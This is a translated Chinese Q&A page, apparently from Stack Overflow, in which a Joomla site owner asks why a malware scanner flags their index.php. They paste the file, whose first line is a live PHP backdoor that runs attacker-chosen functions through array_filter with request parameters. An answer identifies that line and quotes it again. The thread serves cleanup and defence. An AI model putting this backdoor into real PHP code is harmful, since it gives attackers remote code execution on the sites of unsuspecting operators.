Fatal编程技术网
  • php/
  • 如何确定在我的脚本中找到SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL的原因?

如何确定在我的脚本中找到SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL的原因?

php joomla

如何确定在我的脚本中找到SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL的原因?,php,joomla,Php,Joomla,因此,恶意软件扫描的结果返回了以下信息: /sanaciondelalma/sanaciondelalma/configuration.php: 找到SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL /sanaciondelalma/sanaciondelalma/index.php: 找到SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL /sanaciondelalma/sanaciondelalma/images/mod_con

因此,恶意软件扫描的结果返回了以下信息:

/sanaciondelalma/sanaciondelalma/configuration.php: 找到SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL

/sanaciondelalma/sanaciondelalma/index.php: 找到SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL

/sanaciondelalma/sanaciondelalma/images/mod_config.php: 找到SiteLock-PHP-BACKDOOR-GENERIC-md5-efg.non-official

/sanaciondelalma/sanaciondelalma/templates/atomic/error.php: 找到SiteLock-PHP-BACKDOOR-GENERIC-md5-wef.non-official

/pablofaro/images/mod_config.php: 找到SiteLock-PHP-BACKDOOR-GENERIC-md5-efg.non-official

我不知道如何在脚本中识别原因,这里是索引。你能帮忙吗

<?php
if ($_REQUEST['param1']&&$_REQUEST['param2']) {$f = $_REQUEST['param1']; $p = array($_REQUEST['param2']); $pf = array_filter($p, $f); echo 'OK'; Exit;}
/**
 * @package     Joomla.Site
 * @copyright   Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// Set flag that this is a parent file.
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);

if (file_exists(dirname(__FILE__) . '/defines.php')) {
    include_once dirname(__FILE__) . '/defines.php';
}

if (!defined('_JDEFINES')) {
    define('JPATH_BASE', dirname(__FILE__));
    require_once JPATH_BASE.'/includes/defines.php';
}

require_once JPATH_BASE.'/includes/framework.php';

// Mark afterLoad in the profiler.
JDEBUG ? $_PROFILER->mark('afterLoad') : null;

// Instantiate the application.
$app = JFactory::getApplication('site');

// Initialise the application.
$app->initialise();

// Mark afterIntialise in the profiler.
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;

// Route the application.
$app->route();

// Mark afterRoute in the profiler.
JDEBUG ? $_PROFILER->mark('afterRoute') : null;

// Dispatch the application.
$app->dispatch();

// Mark afterDispatch in the profiler.
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;

// Render the application.
$app->render();

// Mark afterRender in the profiler.
JDEBUG ? $_PROFILER->mark('afterRender') : null;

// Return the response.
echo $app;


上面这条线不应该存在

这是恶意脚本注入代码的包装代码行

你应该怎么做


    

  • 更改所有密码
    • 

  • 对你的网站进行干净的安装,尽量避免使用未在joomla官方网站注册的提供商提供的免费软件模板和插件
    • 



我不知道,谢谢!

if ($_REQUEST['param1']&&$_REQUEST['param2']) 
    {
      $f = $_REQUEST['param1'];
      $p = array($_REQUEST['param2']);
      $pf = array_filter($p, $f); 
      echo 'OK'; Exit;
    }